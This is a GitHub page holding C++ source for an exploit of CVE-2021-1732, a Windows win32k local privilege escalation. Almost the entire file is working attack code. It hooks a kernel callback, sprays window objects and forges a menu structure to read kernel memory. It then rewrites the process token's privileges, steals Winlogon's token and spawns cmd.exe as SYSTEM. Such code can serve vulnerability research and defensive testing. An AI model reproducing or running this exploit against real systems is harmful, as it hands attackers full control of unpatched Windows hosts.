-
Notifications
You must be signed in to change notification settings - Fork 16
/
CVE-2021-1732.cpp
444 lines (346 loc) · 14 KB
/
CVE-2021-1732.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
// CVE-2021-1732.cpp : This file contains the 'main' function. Program execution begins and ends there.
//
#include <iostream>
#include <windows.h>
#include <tlhelp32.h>
#include <HookLib.h>
#include "util.h"
#pragma comment(lib, "Zydis.lib")
#pragma comment(lib, "HookLib.lib")
#define CLS_NAME L"PO_WND_CLS"
#define WND_NAME L"PO_WND"
#define SPRAY_WND_COUNT 0x200
#define CALLBACK_INDEX 0x7B
#define TEB_DESKTOPHEAP_OFF 0x828
#define ETHREAD_WIN32THREAD_OFF 0x1c8
#define WIN32THREAD_DESKTOP_OFF 0x1c0
#define DESKTOP_HEAPBASE_OFF 0x80
#define TAGWND_BODY_SIZE 0x150
#define TAGWND_BODY_EXTRA_SIZE_OFF 0xc8
#define TAGWND_BODY_STYLE_OFF 0x1c
#define TAGWND_BODY_REL_FLAG_OFF 0xE8
#define TAGWND_BODY_REL_VALUE_OFF 0x128
#define TOKEN_PRIVILEGE_OFF 0x40
#define MAKE_64BIT_VALUE( h, l ) \
( ((ULONG64)(h) << 32) ) | ( (ULONG64)(l) )
#if 0
#define DEBUG_BREAK() __debugbreak();
#else
#define DEBUG_BREAK()
#endif
HWND SprayWndHandles[SPRAY_WND_COUNT];
using USERMODECALLBACK = VOID(WINAPI*)( ULONG_PTR Para1, ULONG_PTR Para2, ULONG_PTR Para3, ULONG_PTR Para4 );
USERMODECALLBACK UserModeCallback_Orig = NULL;
using NTUSERCONSOLECONTROL = NTSTATUS(WINAPI*)(ULONG_PTR CtrlCode, PVOID CtrlInfo, ULONG_PTR CtrlInfoLen);
NTUSERCONSOLECONTROL NtUserConsoleControl = NULL;
using NTCALLBACKRETURN = NTSTATUS (WINAPI*)( IN PVOID OutputBuffer, IN ULONG OutputLength, IN NTSTATUS Status );
NTCALLBACKRETURN NtCallbackReturn = NULL;
using HMVALIDATEHANDLE = VOID* (WINAPI*)(HWND hwnd, int type);
HMVALIDATEHANDLE HMValidateHandle = NULL;
BOOL FindHMValidateHandle() {
HMODULE hUser32 = LoadLibraryA("user32.dll");
if (hUser32 == NULL) {
printf("Failed to load user32");
return FALSE;
}
BYTE* pIsMenu = (BYTE*)GetProcAddress(hUser32, "IsMenu");
if (pIsMenu == NULL) {
printf("Failed to find location of exported function 'IsMenu' within user32.dll\n");
return FALSE;
}
unsigned int uiHMValidateHandleOffset = 0;
for (unsigned int i = 0; i < 0x1000; i++) {
BYTE* test = pIsMenu + i;
if (*test == 0xE8) {
uiHMValidateHandleOffset = i + 1;
break;
}
}
if (uiHMValidateHandleOffset == 0) {
printf("Failed to find offset of HMValidateHandle from location of 'IsMenu'\n");
return FALSE;
}
unsigned int addr = *(unsigned int*)(pIsMenu + uiHMValidateHandleOffset);
unsigned int offset = ((unsigned int)pIsMenu - (unsigned int)hUser32) + addr;
HMValidateHandle = (HMVALIDATEHANDLE)((ULONG_PTR)hUser32 + offset + 11);
return TRUE;
}
ULONG GetWndObjOffset(ULONG_PTR hwnd ) {
PVOID pCurWndObj = NULL;
ULONG_PTR ulWndObjOff = 0x0;
ULONG_PTR ulTebAddr = 0;
ulTebAddr = __readgsqword(0x30);
pCurWndObj = HMValidateHandle((HWND)hwnd, 0x1); // window type fix 1
ulWndObjOff = (ULONG_PTR)pCurWndObj - *(ULONG_PTR*)(ulTebAddr + TEB_DESKTOPHEAP_OFF);
return ulWndObjOff;
}
VOID WINAPI UserModeCallback_Proxy(ULONG_PTR Para1, ULONG_PTR Para2, ULONG_PTR Para3, ULONG_PTR Para4)
{
ULONG_PTR ulConsoleInfo[0x2] = { 0 };
ULONG_PTR ulRetBuffer[0x3] = { 0 };
ULONG ulCurWnd = (ULONG)SprayWndHandles[SPRAY_WND_COUNT / 2];
ULONG_PTR ulWndObjOff = 0x0;
printf("UserMode Callback: %llx %llx %llx %llx\n", Para1, Para2, Para3, Para4 );
printf( "Current window is Handle %X\n", ulCurWnd);
// since it was freed and occupied again , so the index increase one, details see my blog's article!
{
USHORT usHigh = (ulCurWnd >> 0x10) & 0xffff;
USHORT usLow = ulCurWnd & 0xffff;
ulCurWnd = ((usHigh + 1) << 0x10) | usLow;
}
DEBUG_BREAK();
ulWndObjOff = GetWndObjOffset(ulCurWnd);
printf("Current Window Object relative to DesktopHeap's offset:%X\n", ulWndObjOff);
// trigle to change flag
ulConsoleInfo[0] = ulCurWnd;
NtUserConsoleControl(0x6, (PVOID)&ulConsoleInfo, sizeof(ulConsoleInfo));
ulRetBuffer[0] = ulWndObjOff;
NtCallbackReturn(&ulRetBuffer, sizeof(ulRetBuffer), 0x0);
// hook: call origin function, in this case, don't need, due to USER32!_xxxClientAllocWindowClassExtraBytes's internal call NtCallbackReturn
//UserModeCallback_Orig(Para1, Para2, Para3, Para4);
}
BOOL RegistWndClass( PCTSTR ClsName ) {
WNDCLASS wc = { 0 };
wc.lpfnWndProc = DefWindowProc;
wc.hInstance = GetModuleHandle(NULL);
wc.lpszClassName = ClsName;
wc.cbWndExtra = 0x100; // must specify, otherwise can't triggle xxxClientAllocWindowClassExtraBytes
return !!RegisterClass(&wc);
}
HWND CreateWnd( PCTSTR ClsName ) {
return CreateWindowEx(NULL, ClsName, WND_NAME, NULL, 0, 0, 0, 0, NULL, NULL, GetModuleHandle(NULL), NULL);
}
VOID ReBuildData( PMENUBARINFO MenuBarInfoPtr, ULONG_PTR* RetValue0, ULONG_PTR* RetValue1 ) {
ULONG_PTR ulValue0 = MAKE_64BIT_VALUE((ULONG)(MenuBarInfoPtr->rcBar.top), (ULONG)(MenuBarInfoPtr->rcBar.left));
ULONG ulLow = (ULONG)((ULONG)(MenuBarInfoPtr->rcBar.right) - (ULONG)(MenuBarInfoPtr->rcBar.left));
ULONG ulHigh = (ULONG)((ULONG)(MenuBarInfoPtr->rcBar.bottom) - (ULONG)(MenuBarInfoPtr->rcBar.top));
ULONG_PTR ulValue1 = MAKE_64BIT_VALUE(ulHigh, ulLow);
*RetValue0 = ulValue0;
*RetValue1 = ulValue1;
}
ULONG_PTR ReadPrimitive( HWND TargetWnd ) {
MENUBARINFO menuBarInfo;
ULONG_PTR ulValue0, ulValue1;
menuBarInfo.cbSize = sizeof(menuBarInfo);
GetMenuBarInfo(TargetWnd, OBJID_MENU, 0x1, &menuBarInfo);
ReBuildData(&menuBarInfo, &ulValue0, &ulValue1);
return ulValue0;
}
ULONG_PTR GetCurThreadObjAddr() {
HANDLE hThread = INVALID_HANDLE_VALUE;
ULONG_PTR ulAddr = 0x0;
hThread = OpenThread(THREAD_QUERY_INFORMATION, FALSE, GetCurrentThreadId());
if (hThread != INVALID_HANDLE_VALUE){
ulAddr = (ULONG_PTR)GetTargetHandleObject(GetCurrentProcessId(), (ULONG_PTR)hThread);
CloseHandle(hThread);
return ulAddr;
}
return 0;
}
ULONG_PTR GetCurTokenObjAddr() {
HANDLE hProc;
HANDLE hToken;
PVOID pTokenObj;
hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, GetCurrentProcessId());
OpenProcessToken(
hProc,
TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY,
&hToken);
pTokenObj = GetTargetHandleObject(GetCurrentProcessId(), (ULONG_PTR)hToken);
return (ULONG_PTR)pTokenObj;
}
BOOL GetProIDByName(PCWCHAR ImageName, ULONG_PTR* ProcIDPtr)
{
HANDLE hSnapshot = INVALID_HANDLE_VALUE;
PROCESSENTRY32 pe32;
hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE)
return FALSE;
pe32.dwSize = sizeof(pe32);
if (Process32First(hSnapshot, &pe32))
{
do {
if (lstrcmpi(ImageName, pe32.szExeFile) == 0)
{
CloseHandle(hSnapshot);
*ProcIDPtr = pe32.th32ProcessID;
return TRUE;
}
} while (Process32Next(hSnapshot, &pe32));
}
CloseHandle(hSnapshot);
return FALSE;
}
VOID CreateEopProc() {
HANDLE hProc;
HANDLE hToken;
HANDLE hEopToken;
ULONG_PTR ulWinlogonPID = 0;
if (!GetProIDByName(L"Winlogon.exe", &ulWinlogonPID) || !ulWinlogonPID)
return;
hProc = OpenProcess(
PROCESS_QUERY_INFORMATION,
FALSE,
ulWinlogonPID );
OpenProcessToken(
hProc,
TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY,
&hToken);
SECURITY_IMPERSONATION_LEVEL seImpersonateLevel = SecurityImpersonation;
TOKEN_TYPE tokenType = TokenPrimary;
if (!DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, seImpersonateLevel, tokenType, &hEopToken))
return;
/* Starts a new process with SYSTEM token */
STARTUPINFOW si = {};
PROCESS_INFORMATION pi = {};
CreateProcessWithTokenW(
hEopToken,
LOGON_NETCREDENTIALS_ONLY,
L"C:\\Windows\\System32\\cmd.exe",
NULL,
CREATE_NEW_CONSOLE,
NULL,
NULL,
&si,
&pi);
}
int main()
{
HMODULE hWin32uMod = LoadLibrary(TEXT("win32u.dll"));
HMODULE hWinNtdllMod = LoadLibrary(TEXT("ntdll.dll"));
ULONG_PTR ulPebAddr = __readgsqword(0x60);
PULONG_PTR pUserModeCallbackTable = *(PULONG_PTR*)(ulPebAddr + 0x58);
DEBUG_BREAK();
NtUserConsoleControl = (NTUSERCONSOLECONTROL)GetProcAddress(hWin32uMod, "NtUserConsoleControl");
NtCallbackReturn = (NTCALLBACKRETURN)GetProcAddress(hWinNtdllMod, "NtCallbackReturn");
InitGlobalFunc();
FindHMValidateHandle();
if (RegistWndClass(CLS_NAME) ) {
for (int i = 0; i < SPRAY_WND_COUNT; i++) {
SprayWndHandles[i] = CreateWnd(CLS_NAME);
}
printf("SprayWndHandles[%x] == %X \n", SPRAY_WND_COUNT / 2, SprayWndHandles[SPRAY_WND_COUNT / 2]);
DestroyWindow(SprayWndHandles[SPRAY_WND_COUNT/2]);
SetHook((PVOID)(pUserModeCallbackTable[CALLBACK_INDEX]), UserModeCallback_Proxy, reinterpret_cast<PVOID*>(&UserModeCallback_Orig));
HWND hTargetWnd = CreateWnd(CLS_NAME);
printf("hTargetWnd == %X\n", hTargetWnd);
DEBUG_BREAK();
{
ULONG_PTR ulDesktopHeapBase = 0x0;
ULONG_PTR ulFakeHandle = 0xFFFF;
ULONG_PTR ulFakeRefCount[2] = { 0 };
PULONG_PTR pFakeMenu = NULL;
PULONG_PTR pFakeMenuBody = NULL;
PULONG_PTR pFakeItems = NULL;
// 1. Adjust taget wnd's style to WFCHILD(0x40), thus we can set spmenu value
SetWindowLong(hTargetWnd, TAGWND_BODY_STYLE_OFF, 0x40c00000);
// 2. Set Fake menu to Wnd Object Header(+0xa8)
pFakeMenu = (PULONG_PTR)VirtualAlloc(NULL, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
pFakeMenuBody = (PULONG_PTR)VirtualAlloc(NULL, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
pFakeItems = (PULONG_PTR)VirtualAlloc(NULL, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
SetWindowLongPtr(hTargetWnd, GWLP_ID, (LONG_PTR)pFakeMenu);
// 3. Restore target wnd's style
SetWindowLong(hTargetWnd, TAGWND_BODY_STYLE_OFF, 0x04c00000);
// 4. build fake menu's bar info
pFakeMenu[0] = (ULONG_PTR)&ulFakeHandle;
pFakeMenu[5] = (ULONG_PTR)pFakeMenuBody; // fake body
((PULONG)(&pFakeMenuBody[5]))[1] = 0xffff; // make items count to max
((PULONG)(&pFakeMenu[8]))[0] = 1; // make menu'x to 1
((PULONG)(&pFakeMenu[8]))[1] = 1; // make menu'y to 1
pFakeMenu[0xb] = (ULONG_PTR)pFakeItems; // set fake menu's fake items
ulFakeRefCount[0] = (ULONG_PTR)pFakeMenu;
pFakeMenu[0x13] = (ULONG_PTR)&ulFakeRefCount;
// 5. read target address's info
{
ULONG_PTR ulAddr = 0;
ULONG_PTR ulValue = 0;
ulAddr = GetCurThreadObjAddr();
if (!ulAddr)
return -1;
pFakeItems[0] = (ULONG_PTR)(ulAddr + ETHREAD_WIN32THREAD_OFF - 0x40); // target address you want to read(+0x40)
ulValue = 0;
ulValue = ReadPrimitive(hTargetWnd);
pFakeItems[0] = (ULONG_PTR)(ulValue - 0x40);
ulValue = 0;
ulValue = ReadPrimitive(hTargetWnd);
pFakeItems[0] = (ULONG_PTR)(ulValue + WIN32THREAD_DESKTOP_OFF - 0x40);
ulValue = 0;
ulValue = 0;
ulValue = ReadPrimitive(hTargetWnd);
pFakeItems[0] = (ULONG_PTR)(ulValue + DESKTOP_HEAPBASE_OFF - 0x40);
ulValue = 0;
ulValue = ReadPrimitive(hTargetWnd);
ulDesktopHeapBase = ulValue;
}
DEBUG_BREAK();
// 6.modify current process's token
{
ULONG_PTR ulWndOffset = 0x0;
ULONG_PTR ulValue = 0x0;
ULONG_PTR ulTokenObjAddr = 0x0;
HWND hAdjacentWnd = 0x0;
ULONG ulTagWndBodySize = TAGWND_BODY_SIZE; // need to fix, may be 0x140, or 0x160
BOOLEAN bAdjacent = FALSE;
hAdjacentWnd = SprayWndHandles[SPRAY_WND_COUNT / 2 + 1];
ulWndOffset = GetWndObjOffset((ULONG_PTR)hTargetWnd);
// 6.1 verify adjacent and fix offset
for (ULONG ulIndex = 0x0; ulIndex < 0x30; ulIndex += 8) {
pFakeItems[0] = (ULONG_PTR)(ulDesktopHeapBase + ulWndOffset + ulTagWndBodySize + ulIndex - 0x40);
ulValue = 0;
ulValue = ReadPrimitive(hTargetWnd);
if (ulValue == (ULONG_PTR)hAdjacentWnd) {
bAdjacent = TRUE;
ulTagWndBodySize += ulIndex;
break;
}
}
// 6.2
if (bAdjacent) {
// read adjacent hwnd's flag
pFakeItems[0] = (ULONG_PTR)(ulDesktopHeapBase + ulWndOffset + ulTagWndBodySize + TAGWND_BODY_REL_FLAG_OFF - 0x40);
ulValue = 0;
ulValue = ReadPrimitive(hTargetWnd);
ulTokenObjAddr = GetCurTokenObjAddr();
SetWindowLongPtr(hTargetWnd, TAGWND_BODY_EXTRA_SIZE_OFF, (ULONG_PTR)-1);
SetWindowLongPtr(hTargetWnd, ulTagWndBodySize + TAGWND_BODY_REL_FLAG_OFF, ulValue | 0x800);
SetWindowLongPtr(hTargetWnd, ulTagWndBodySize + TAGWND_BODY_REL_VALUE_OFF, ulTokenObjAddr - ulDesktopHeapBase);
SetWindowLongPtr(hTargetWnd, ulTagWndBodySize + TAGWND_BODY_EXTRA_SIZE_OFF, (ULONG_PTR)-1);
// adjacent wnd can modify token's anything
SetWindowLongPtr(hAdjacentWnd, 0x40, (ULONG_PTR)-1);
SetWindowLongPtr(hAdjacentWnd, 0x48, (ULONG_PTR)-1);
SetWindowLong(hAdjacentWnd, 0x498 + 0x30, 0x7);
SetWindowLong(hAdjacentWnd, 0x498 + 0x40, 0xf);
// Restore adjacent window
pFakeItems[0] = (ULONG_PTR)(ulDesktopHeapBase + ulWndOffset + ulTagWndBodySize + TAGWND_BODY_REL_FLAG_OFF - 0x40);
ulValue = 0;
ulValue = ReadPrimitive(hTargetWnd);
SetWindowLongPtr(hTargetWnd, ulTagWndBodySize + TAGWND_BODY_REL_FLAG_OFF, ulValue & ~0x800);
SetWindowLongPtr(hTargetWnd, ulTagWndBodySize + TAGWND_BODY_REL_VALUE_OFF, 0);
SetWindowLongPtr(hTargetWnd, ulTagWndBodySize + TAGWND_BODY_EXTRA_SIZE_OFF, 0x100 ); // our specified size
SetWindowLongPtr(hTargetWnd, TAGWND_BODY_EXTRA_SIZE_OFF, 0x100); // out specified size
}
}
// 7. Create Eop Process
DEBUG_BREAK();
CreateEopProc();
// 8. Restore modified window objects
{
ULONG_PTR ulWndOffset = 0x0;
ULONG_PTR ulValue = 0x0;
ulWndOffset = GetWndObjOffset((ULONG_PTR)hTargetWnd);
pFakeItems[0] = (ULONG_PTR)(ulDesktopHeapBase + ulWndOffset + TAGWND_BODY_REL_FLAG_OFF - 0x40);
ulValue = 0;
ulValue = ReadPrimitive(hTargetWnd);
// 8.1 restore fake menu to NULL
SetWindowLongPtr(hTargetWnd, GWLP_ID, 0x0);
// 8.2 Restore target wnd's style
SetWindowLong(hTargetWnd, TAGWND_BODY_STYLE_OFF, 0x04c00000);
// 8.3 Restore target wnd's relative flag
SetWindowLongPtr(hTargetWnd, TAGWND_BODY_REL_FLAG_OFF, ulValue & ~0x800);
// 8.4 restore relative value to NULL
SetWindowLongPtr(hTargetWnd, TAGWND_BODY_REL_VALUE_OFF, 0);
}
getchar();
}
}
}